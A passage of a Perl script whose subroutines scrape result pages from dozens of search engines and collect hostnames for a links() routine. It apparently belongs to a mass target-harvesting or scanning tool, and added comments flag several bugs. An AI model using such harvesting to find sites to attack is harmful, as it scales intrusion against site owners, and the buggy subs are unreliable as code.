  2497.                 while ($res =~ m/http:\/\/(.+?)\//g) {
  2498.             my $link = $1; if ($link!~ /alltheweb/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2499.                 }
  2500.      }
  2501. return @list;
  2502. }
  2503. ############### GOED
  2504. sub rediff() {
            # Result scraper for search1.rediff.com. Arg: the search string.
            # Eleven page requests (firstres = 0, 100, ... 1000); captured hosts
            # matching /rediff\.com/ are skipped, the rest are cleaned and passed
            # to links().
  2505.     my @list;
  2506.     my $key = $_[0];
  2507.     for (my $i=0; $i<=1000; $i+=100) {
  2508.         my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
  2509.         my $res = &search_engine_query($search);
  2510.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2511.             my $link = $1; if ($link!~ /rediff\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2512.         }
  2513.     }
  2514. return @list;
  2515. }
  2516. ############### GOED
  2517. sub mamma(){
                # Result scraper for www.mamma.com. Arg: the search string.
                # Eleven page requests (p = 0, 100, ... 1000). Hosts are taken from
                # the text following target="_blank"> up to the next "/"; entries
                # matching msn, live, google or yahoo are skipped, the rest are
                # cleaned and passed to links().
  2518.         my @list;
  2519.         my $key = $_[0];
  2520.         for($b=0;$b<=1000;$b+=100){
  2521.                 my $Th=("http://www.mamma.com/result.php?q=".key($key)."&type=web&p=".$b);
  2522.                 my $Res=&search_engine_query($Th);
  2523.                 while($Res =~ m/target=\"_blank\">(.+?)\//g){
  2524.                         my $link = $1; if ($link!~ /msn|live|google|yahoo/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2525.                 }
  2526.         }
  2527. return @list;
  2528. }
  2529. #### -
  2530. sub uol() {
            # Result scraper for mundo.busca.uol.com.br. Arg: the search string.
            # Ten page requests (start = 1, 101, ... 901); captured hosts
            # containing "uol" are skipped, the rest are cleaned and passed to
            # links().
  2531.     my @list;
  2532.     my $key = $_[0];
  2533.     for (my $i=1; $i<=1000; $i+=100) {
  2534.         my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key)."&start=".$i);
  2535.         my $res = &search_engine_query($search);
  2536.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2537.             my $link = $1; if ($link!~ /uol/) { $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2538.         }
  2539.     }
  2540. return @list;
  2541. }
  2542. ############### GOED
  2543. sub bing() {
            # Result scraper for www.bing.com. Arg: the search string.
            # Ten page requests (first = 1, 101, ... 901); captured hosts matching
            # /bingj|bing\.com/ are skipped, the rest are cleaned and passed to
            # links().
  2544.     my @list;
  2545.     my $key = $_[0];
  2546.     for (my $i=1; $i<=1000; $i+=100) {
  2547.         my $search = ("http://www.bing.com/search?q=".&key($key)."&first=".$i."&FORM=PERE");
  2548.         my $res = &search_engine_query($search);
  2549.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2550.             my $link = $1; if ($link!~ /bingj|bing\.com/) { $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2551.         }
  2552.     }
  2553. return @list;
  2554. }
  2555. ############### GOED
  2556. sub altavista() {
            # Scraper labelled "altavista"; the requests go to search.yahoo.com
            # with fr=altavista. Arg: the search string.
            # Ten page requests (vst = 1, 101, ... 901). Hosts are captured from
            # URL-encoded links (http%3a//...); entries matching /yahoo\.com/ are
            # skipped, the rest are cleaned and passed to links().
  2557.     my @list;
  2558.     my $key = $_[0];
  2559.     for (my $i=1; $i<=1000; $i+=100){
  2560.         my $search = ("http://search.yahoo.com/search?n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=".$i."&vf=all&vm=p&fl=0&fr=altavista&p=".&key($key)."&vs=");
  2561.         my $res = &search_engine_query($search);
  2562.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2563.             my $link = $1; if ($link!~ /yahoo\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2564.         }
  2565.     }
  2566. return @list;
  2567. }
  2568. ############### GOED
  2569. sub ask() {
            # Result scraper for uk.ask.com. Arg: the search string.
            # Ten page requests (page = 1, 101, ... 901) with a fixed qid value;
            # captured hosts matching /ask\.com/ are skipped, the rest are cleaned
            # and passed to links().
  2570.     my @list;
  2571.     my $key = $_[0];
  2572.     for (my $i=1; $i<=1000; $i+=100) {
  2573.         my $search = ("http://uk.ask.com/web?q=".&key($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  2574.         my $res = &search_engine_query($search);
  2575.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2576.             my $link = $1; if ($link!~ /ask\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2577.         }
  2578.     }
  2579. return @list;
  2580. }
  2581. ############### GOED
  2582. sub yahoo(){
            # Result scraper for search.yahoo.com. Arg: the search string.
            # Ten page requests (b = 1, 101, ... 901; n=100). Hosts are captured
            # from URL-encoded links (http%3a//...); entries matching /yahoo\.com/
            # are skipped, the rest are cleaned and passed to links().
  2583.     my @list;
  2584.         my $key = $_[0];
  2585.         for ($b=1; $b<=1000; $b+=100) {
  2586.         my $search = ("http://search.yahoo.com/search?n=100&p=".&key($key)."&b=".$b);
  2587.         my $res = &search_engine_query($search);
  2588.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2589.             my $link = $1; if ($link!~ /yahoo\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2590.         }
  2591.     }
  2592. return @list;
  2593. }
  2594. ############### GOED
  2595. sub yahoo2() {
          # Result scraper for regional Yahoo search hosts. Arg: the search string.
          # @doms lists the country prefixes; $dom receives one at random. The
          # request URL itself is assembled from $domain, the encoded search string
          # and the page offset $i (1, 101, ... 901). Extraction and filtering are
          # the same as in yahoo().
  2596.   my @list;
  2597.   my $key = $_[0];
  2598.   my @doms = ("at","au","br","ca","de","es","fr","it","uk");
  2599.   my $dom = $doms[rand(scalar(@doms))];
  2600.     for (my $i=1; $i<=1000; $i+=100) {
  2601.         my $search = ("http://".$domain.".search.yahoo.com/search?n=100&p=".&key($key)."&b=".$i);
  2602.         my $res = &search_engine_query($search);
  2603.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2604.             my $link = $1; if ($link!~ /yahoo\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2605.         }
  2606.     }
  2607. return @list;
  2608. }
  2609. ############### GOED
  2610. sub clusty() {
            # Scraper labelled "clusty"; the requests go to search.yippy.com.
            # Arg: the search string. Ten page requests (offset 10, 110, ... 910);
            # captured hosts matching /yippy\.com/ are skipped, the rest are
            # cleaned and passed to links().
  2611.     my @list;
  2612.         my $key = $_[0];
  2613.         for ($b=10; $b<=1000; $b+=100) {
  2614.         my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
  2615.         my $res = &search_engine_query($search);
  2616.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2617.             my $link = $1; if ($link!~ /yippy\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2618.         }
  2619.     }
  2620. return @list;
  2621. }
  2622. #### +
  2623. sub gutser() {
            # Scraper labelled "gutser"; the requests go to www.goodsearch.com.
            # Arg: the search string. Ten page requests (page = 1, 101, ... 901);
            # captured hosts matching goodsearch, good.is, w3.org or quantserve
            # are skipped, the rest are cleaned and passed to links().
  2624.     my @list;
  2625.     my $key = $_[0];
  2626.     for ($b=1; $b<=1000; $b+=100) {
  2627.         my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0");
  2628.         my $res = &search_engine_query($search);
  2629.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2630.             my $link = $1; if ($link!~ /goodsearch|good\.is|w3\.org|quantserve/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2631.         }
  2632.     }
  2633. return @list;
  2634. }
  2635. #### -
  2636. sub exalead() {
          # Result scraper for www.exalead.com. Arg: the search string.
          # Eleven page requests (start_index = 0, 100, ... 1000); text captured
          # by the link pattern is skipped when it contains "exalead", otherwise
          # cleaned and passed to links().
  2637.   my @list;
  2638.   my $key = $_[0];
  2639.     for ($b=0; $b<=1000; $b+=100) {
  2640.         my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=100&start_index=".$b);
  2641.         my $res = &search_engine_query($search);
  2642.         while ($res =~ m/http\/\/(.+?)\//g) {
  2643.             my $link = $1; if ($link!~ /exalead/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2644.             }
  2645.         }
  2646. return @list;  
  2647. }      
  2648. ############### GOED
  2649. sub lycos() {
          # Result scraper for search.lycos.com. Arg: the search string.
          # Eleven page requests (page2 = 0, 100, ... 1000) with a fixed diktfc
          # value; captured hosts matching /lycos\.com/ are skipped, the rest are
          # cleaned and passed to links().
  2650.   my @list;
  2651.   my $key = $_[0];
  2652.     for ($b=0; $b<=1000; $b+=100) {
  2653.         my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
  2654.         my $res = &search_engine_query($search);
  2655.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2656.             my $link = $1; if ($link!~ /lycos\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2657.         }
  2658.     }
  2659. return @list;  
  2660. }      
  2661. ############### GOED
  2662. sub virgilio() {
          # Result scraper for ricerca.virgilio.it. Arg: the search string.
          # Ten page requests (offset = 10, 110, ... 910; hits=100); captured
          # hosts matching /\.virgilio\.it/ are skipped, the rest are cleaned and
          # passed to links().
  2663.   my @list;
  2664.   my $key = $_[0];
  2665.     for ($b=10; $b<=1000; $b+=100) {
  2666.         my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=100&offset=".$b);
  2667.         my $res = &search_engine_query($search);
  2668.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2669.             my $link = $1; if ($link!~ /\.virgilio\.it/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2670.         }
  2671.     }
  2672. return @list;  
  2673. }      
  2674. #### +
  2675. sub webde() {
          # Result scraper for suche.web.de. Arg: the search string.
          # Ten page requests (pageIndex = 1, 101, ... 901); captured hosts
          # containing "suche" or "web" anywhere are skipped, the rest are cleaned
          # and passed to links().
  2676.   my @list;
  2677.   my $key = $_[0];
  2678.     for ($b=1; $b<=1000; $b+=100) {
  2679.         my $search = ("http://suche.web.de/search/web/?pageIndex=".$b."&su=".&key($key)."&search=Suche");
  2680.         my $res = &search_engine_query($search);
  2681.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2682.             my $link = $1; if ($link!~ /suche|web/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2683.         }
  2684.     }
  2685. return @list;  
  2686. }
  2687. #### -
  2688. sub hotbot() {
          # Result scraper for www.hotbot.com. Arg: the search string.
          # Eleven page requests (page = 0, 100, ... 1000) with a fixed diktfc
          # value; captured hosts containing "hotbot" are skipped, the rest are
          # cleaned and passed to links().
  2689.   my @list;
  2690.   my $key = $_[0];
  2691.     for ($b=0; $b<=1000; $b+=100) {
  2692.         my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
  2693.         my $res = &search_engine_query($search);
  2694.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2695.             my $link = $1; if ($link!~ /hotbot/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2696.         }
  2697.     }
  2698. return @list;  
  2699. }
  2700. #### + 
  2701. sub aol() {
          # Result scraper for aim.search.aol.com. Arg: the search string.
          # Ten page requests (page = 2, 102, ... 902); captured hosts containing
          # "aol" are skipped, the rest are cleaned and passed to links().
  2702.   my @list;
  2703.   my $key = $_[0];
  2704.     for ($b=2; $b<=1000; $b+=100) {
  2705.         my $search = ("http://aim.search.aol.com/aol/search?q=".&key($key)."&page=".$b);
  2706.         my $res = &search_engine_query($search);
  2707.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2708.             my $link = $1; if ($link!~ /aol/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2709.         }
  2710.     }
  2711. return @list;  
  2712. }
  2713. #### +
  2714. sub sapo(){
            # Result scraper for pesquisa.sapo.pt. Arg: the search string.
            # Ten page requests (page = 1, 101, ... 901; limit=100); captured
            # hosts containing "sapo" are skipped, the rest are cleaned and passed
            # to links().
  2715.     my @list;
  2716.         my $key = $_[0];
  2717.         for ($b=1; $b<=1000; $b+=100) {
  2718.         my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=100&location=pt&page=".$b."&q=".&key($key)."&st=local");
  2719.         my $res = &search_engine_query($search);
  2720.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2721.             my $link = $1; if ($link!~ /sapo/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2722.         }
  2723.     }
  2724. return @list;
  2725. }
  2726. ############### GOED
  2727. sub duck() {
                # Result scraper for duckduckgo.com/html/. Arg: the search string.
                # Ten page requests (p = 1, 101, ... 901). Hosts are captured only
                # from anchors of the form rel="nofollow" href="http://..."; those
                # containing "duckduckgo" are skipped, the rest are cleaned and
                # passed to links().
  2728.         my @list;
  2729.         my $key = $_[0];
  2730.         for ($b=1; $b<=1000; $b+=100) {
  2731.         my $search = ("http://duckduckgo.com/html/?q=".&key($key)."&l=us-en&p=".$b."&s=100&o=json&dc=54&api=d.js");
  2732.         my $res = &search_engine_query($search);
  2733.         while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\//g) {
  2734.             my $link = $1; if ($link!~ /duckduckgo/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2735.         }
  2736.     }
  2737. return @list;
  2738. }
  2739. #### -
  2740. sub yause() {
                # Scraper labelled "yause"; the requests go to www.yauba.com.
                # Arg: the search string. Ten page requests (pg = 1, 101, ... 901);
                # captured hosts matching /yauba\.com/ are skipped, the rest are
                # cleaned and passed to links().
  2741.         my @list;
  2742.         my $key = $_[0];
  2743.         for ($b=1; $b<=1000; $b+=100) {
  2744.         my $search = ("http://www.yauba.com/?query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&pg=".$b);
  2745.         my $res = &search_engine_query($search);
  2746.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2747.             my $link = $1; if ($link!~ /yauba\.com/){$link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2748.         }
  2749.     }
  2750. return @list;
  2751. }
  2752. ############### GOED
  2753. sub baidu() {
                # Result scraper for www.baidu.com. Arg: the search string.
                # Eleven page requests (pn = 0, 100, ... 1000). Hosts are captured
                # from href="http://..." attributes; those matching /baidu\.com/
                # are skipped, the rest are cleaned and passed to links().
  2754.         my @list;
  2755.         my $key = $_[0];
  2756.         for ($b=0; $b<=1000; $b+=100) {
  2757.         my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
  2758.         my $res = &search_engine_query($search);
  2759.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2760.             my $link = $1; if ($link!~ /baidu\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2761.         }
  2762.     }
  2763. return @list;
  2764. }
  2765. ############### GOED
  2766. sub black() {
                # Scraper labelled "black"; the requests go to blekko.com.
                # Arg: the search string. Eleven page requests (p = 0, 100, ...
                # 1000); captured hosts containing "blekko" are skipped, the rest
                # are cleaned and passed to links().
  2767.         my @list;
  2768.         my $key = $_[0];
  2769.         for ($b=0; $b<=1000; $b+=100) {
  2770.         my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
  2771.         my $res = &search_engine_query($search);
  2772.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2773.             my $link = $1; if ($link!~ /blekko/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2774.         }
  2775.     }
  2776. return @list;
  2777. }
  2778. ############### GOED
  2779. sub onet() {
                # Result scraper for szukaj.onet.pl. Arg: the search string.
                # Ten page requests (page number 1, 101, ... 901 in the path);
                # captured hosts matching onet, webcache or query are skipped, the
                # rest are cleaned and passed to links().
  2780.         my @list;
  2781.         my $key = $_[0];
  2782.         for ($b=1; $b<=1000; $b+=100) {
  2783.         my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
  2784.         my $res = &search_engine_query($search);
  2785.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2786.             my $link = $1; if ($link!~ /onet|webcache|query/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2787.         }
  2788.     }
  2789. return @list;
  2790. }
  2791. ############### GOED
  2792. sub sizuka() {
                # Scraper labelled "sizuka"; the requests go to www.szukacz.pl.
                # Arg: the search string. Ten page requests (start = 10, 110, ...
                # 910); captured hosts containing "szukacz" are skipped, the rest
                # are cleaned and passed to links().
  2793.         my @list;
  2794.         my $key = $_[0];
  2795.         for ($b=10; $b<=1000; $b+=100) {
  2796.         my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);
  2797.         my $res = &search_engine_query($search);
  2798.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2799.             my $link = $1; if ($link!~ /szukacz/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2800.         }
  2801.     }
  2802. return @list;
  2803. }
  2804. #### -
  2805. sub walla() {
                # Result scraper for search.walla.co.il. Arg: the search string.
                # Eleven page requests (p = 0, 100, ... 1000); captured hosts
                # matching /walla\.co\.il/ are skipped, the rest are cleaned and
                # passed to links().
  2806.         my @list;
  2807.         my $key = $_[0];
  2808.         for ($b=0; $b<=1000; $b+=100) {
  2809.         my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".$b);
  2810.         my $res = &search_engine_query($search);
  2811.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2812.             my $link = $1; if ($link!~ /walla\.co\.il/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2813.         }
  2814.     }
  2815. return @list;
  2816. }
  2817. #### -
  2818. sub demos() {
  2819.         my @list;
  2820.         my $key = $_[0];
  2821.         for ($b=0; $b<=1000; $b+=100) {
  2822.         my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");
  2823.         my $res = &search_engine_query($search);
  2824.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2825.             my $link = $1; if ($link!~ /search|dmoz/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2826.         }
  2827.     }
  2828. return @list;
  2829. }
  2830. #### -
  2831. sub rose() {
          # Collects candidate hostnames from euroseek.com result pages for the
          # search phrase in $_[0]; returns the list built by links().
  2832.   my @list;
  2833.   my $key = $_[0];
  2834.   my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
          # One language code is picked at random per call.
  2835.         my $lang = $langs[rand(scalar(@langs))];
  2836.     for ($b=0; $b<=1000; $b+=100) {
            # NOTE(review): the URL interpolates $language, not the $lang chosen
            # above. $language is not declared in this sub, so its value depends
            # on a global that is not visible here.
  2837.         my $search = ("http://euroseek.com/system/search.cgi?language=".$language."&mode=internet&start=".$b."&string=".&key($key));
  2838.         my $res = &search_engine_query($search);
  2839.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2840.             my $link = $1; if ($link!~ /euroseek/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2841.         }
  2842.     }
  2843. return @list;
  2844. }
  2845. ############### GOED
  2846. sub seznam() {
  2847.         my @list;
  2848.         my $key = $_[0];
  2849.         for ($b=1; $b<=1000; $b+=100) {
  2850.         my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=100&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
  2851.         my $res = &search_engine_query($search);
  2852.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2853.             my $link = $1; if ($link!~ /seznam/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2854.         }
  2855.     }
  2856. return @list;
  2857. }
  2858. #### -
  2859. sub tiscali() {
  2860.         my @list;
  2861.         my $key = $_[0];
  2862.         for ($b=0; $b<=1000; $b+=100) {
  2863.         my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
  2864.         my $res = &search_engine_query($search);
  2865.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2866.             my $link = $1; if ($link!~ /tiscali/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2867.         }
  2868.     }
  2869. return @list;
  2870. }
  2871. #### +
  2872. sub naver() {
  2873.         my @list;
  2874.         my $key = $_[0];
  2875.         for ($b=1; $b<=1000; $b+=100) {
  2876.         my $search = ("http://web.search.naver.com/search.naver?where=webkr&query=".&key($key)."&docid=0&lang=all&f=&srcharea=all&st=s&fd=2&start=".$b."&display=100");
  2877.         my $res = &search_engine_query($search);
  2878.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2879.             my $link = $1; if ($link!~ /naver/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2880.         }
  2881.     }
  2882. return @list;
  2883. }
  2884. #### +
  2885. sub amidalla(){
  2886.     my @list;
  2887.     my $key = $_[0];
  2888.     for ($i=0; $i<=1000; $i+=100){
  2889.         my $web=("http://www.amidalla.de/cgi-bin/amisearch.cgi?search=".&key($key)."&page=".$i."&break=100&af=2&tld=com&et=2");        
  2890.         my $Res=&search_engine_query($web);
  2891.         while ($Res =~ m/http:\/\/(.+?)\//g){
  2892.             my $link = $1; if ($link!~ /amidalla/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2893.         }
  2894.     }
  2895. return @list;
  2896. }
  2897. #### +
  2898. sub buscar() {
  2899.     my @list;
  2900.     my $key = $_[0];
  2901.     for (my $i=1; $i<=1000; $i+=100){
  2902.         my $search = ("http://buscar.ozu.es/index.php?etq=web&q=".&key($key)."&pag=".$i);
  2903.         my $res = &search_engine_query($search);
  2904.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2905.             my $link = $1; if ($link!~ /buscar/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2906.         }
  2907.     }
  2908. return @list;
  2909. }
  2910. ############### GOED
  2911. sub kvasir() {
  2912.     my @list;
  2913.     my $key = $_[0];
  2914.     for (my $i=10; $i<=1000; $i+=100){
  2915.         my $search = ("http://www.kvasir.no/nettsok?offset=".$i."&pageSize=100&q=".&key($key)."");
  2916.         my $res = &search_engine_query($search);
  2917.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2918.             my $link = $1; if ($link!~ /kvasir/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2919.         }
  2920.     }
  2921. return @list;
  2922. }
  2923. #### -
  2924. sub excite(){
  2925.     my @list;
  2926.     my $key = $_[0];
  2927.     for ($i=0; $i<=1000; $i+=100){
  2928.         my $web=("http://msxml.excite.com/excite/ws/results/Web/".&key($key)."/".$i."/0/0/Relevance/zoom=off/qi=31/qk=10/bepersistence=true/_iceUrlFlag=7?_IceUrl=true");
  2929.         my $Res= &search_engine_query($web);
  2930.         while ($Res =~ m/http:\/\/(.+?)\//g){
  2931.             my $link = $1; if ($link!~ /excite/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2932.         }
  2933.     }
  2934. return @list;
  2935. }
  2936. ############### GOED
  2937. sub interia() {
            # Queries google.interia.pl for the search phrase in $_[0], paging
            # p = 0..1000 in steps of 100, and returns @list.
  2938.     my @list;
  2939.     my $key = $_[0];
            # $i is not declared with "my" here, so it is a package global.
  2940.     for ($i = 0;$i<= 1000; $i+= 100) {
  2941.         my $search = ( "http://www.google.interia.pl/szukaj?q=".&key($key)."&s=szukaj&w=sw&szukaj=&p=".$i);
  2942.         my $res = &search_engine_query($search);
            # Unlike the sibling subs, the pattern also requires a closing </a>
            # later on the same line of the response.
  2943.         while ($res =~ m/http:\/\/(.+?)\/(.*)<\/a>/g) {
            # NOTE(review): links() output is stored in @grepb, but @grep is what
            # gets pushed. @grep is not declared in this sub; what it holds, if
            # anything, depends on a global not visible here.
  2944.             my $link = $1; if ($link!~ /google|interia/ ) { $link =~ s/<//g; $link =~ s/ //g; my @grepb = &links($link); push(@list,@grep); }
  2945.        }
  2946.    }
  2947. return @list;
  2948. }
  2949. #### +
  2950. sub snz() {
  2951.     my @list;
  2952.     my $key = $_[0];
  2953.     for (my $i=1; $i<=1000; $i+=100) {
  2954.         my $search = ("http://searchnz.co.nz/search.aspx?q=".&key($key)."&np=".$i);
  2955.         my $res = &search_engine_query($search);
  2956.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2957.             my $link = $1; if ($link!~ /searchnz/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2958.         }
  2959.     }
  2960. return @list;
  2961. }
  2962. ############### GOED
  2963. sub rambler(){
            # Collects candidate hostnames from nova.rambler.ru result pages for
            # the search phrase in $_[0]; returns the list built by links().
  2964.     my @list;
  2965.     my $key = $_[0];
            # Steps by 1, not 100: up to 1000 sequential requests per call, each
            # blocking in search_engine_query(). $b is the package global.
  2966.     for ($b=1; $b<=1000; $b++){
            # The btnG value looks like mis-encoded non-ASCII text; it is sent
            # as-is.
  2967.         my $search=("http://nova.rambler.ru/srch?btnG=DtD%B0DaN?D%B8!&query=".&key($key)."&page=".$b);
  2968.         my $res= &search_engine_query($search);
  2969.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2970.             my $link = $1; if ($link!~ /rambler|nova|cache/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2971.         }
  2972.     }
  2973. return @list;
  2974. }
  2975. #### +
  2976. sub yandex(){
  2977.     my @list;
  2978.     my $key = $_[0];
  2979.     for ($b=0; $b<=1000; $b+=100){
  2980.         my $search=("http://yandex.ru/yandsearch?p=".$b."&text=".&key($key)."&lr=118");
  2981.         my $res= &search_engine_query($search);
  2982.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2983.             my $link = $1; if ($link!~ /yandex/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2984.         }
  2985.     }
  2986. return @list;
  2987. }
  2988. ###
  2989. sub doogate(){
  2990.     my @list;
  2991.     my $key = $_[0];
  2992.     for ($i=0; $i<=1000; $i+=100){
  2993.         my $web=("http://www.doogate.com/search?q=".key($key)."&start=".$i);
  2994.         my $Res= search_engine_query($web);
  2995.         while ($Res =~ m/<a href=\"http:\/\/(.+?)\//g){
  2996.                         my $link = $1; if ($link!~ /doogate/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2997.         }
  2998.     }
  2999. return @list;
  3000. }
  3001. ###
  3002. sub sogou() {
  3003.     my @list;
  3004.     my $key = $_[0];
  3005.     for (my $b=1; $b<=50; $b+=1){
  3006.         my $search = ("http://www.sogou.com/web?query=".&key($key)."&page=".$b);
  3007.         my $res = search_engine_query($search);
  3008.         while ($res =~ m/<a name="dttl" target="_blank" href="http:\/\/(.*?)\"/g) {
  3009.             my $link = $1; if ($link!~ /sogou/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3010.         }
  3011.     }
  3012. return @list;
  3013. }
  3014. ###
  3015. sub joeant(){
  3016.     my @list;
  3017.     my $key = $_[0];
  3018.     for ($b=0; $b<=50; $b+=10){
  3019.         my $search=("http://www.joeant.com/DIR/search.php?keywords=".&key($key)."&page=".$b."&limit=10");
  3020.         my $res= search_engine_query($search);
  3021.         while ($res =~ m/<a href=\http:\/\/(.*?)\//g) {
  3022.             my $link = $1; if ($link!~ /joeant/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3023.         }
  3024.     }
  3025. return @list;
  3026. }
  3027. ###
  3028. sub terra(){
            # Collects candidate URLs from buscador.terra.com for the search
            # phrase in $_[0]; returns the list built by links().
  3029.     my @list;
  3030.     my $key = $_[0];
            # The loop counter never appears in the URL, so the same request is
            # issued six times (b = 0, 10, ..., 50).
  3031.     for ($b=0; $b<=50; $b+=10){
            # $key is appended raw; the sibling subs pass it through key() first.
  3032.         my $search=("http://buscador.terra.com/Results.aspx?ca=a&source=Search&query=".$key);
  3033.         my $res= search_engine_query($search);
            # Captures everything up to the closing quote, i.e. host plus path,
            # where most sibling subs stop at the first "/".
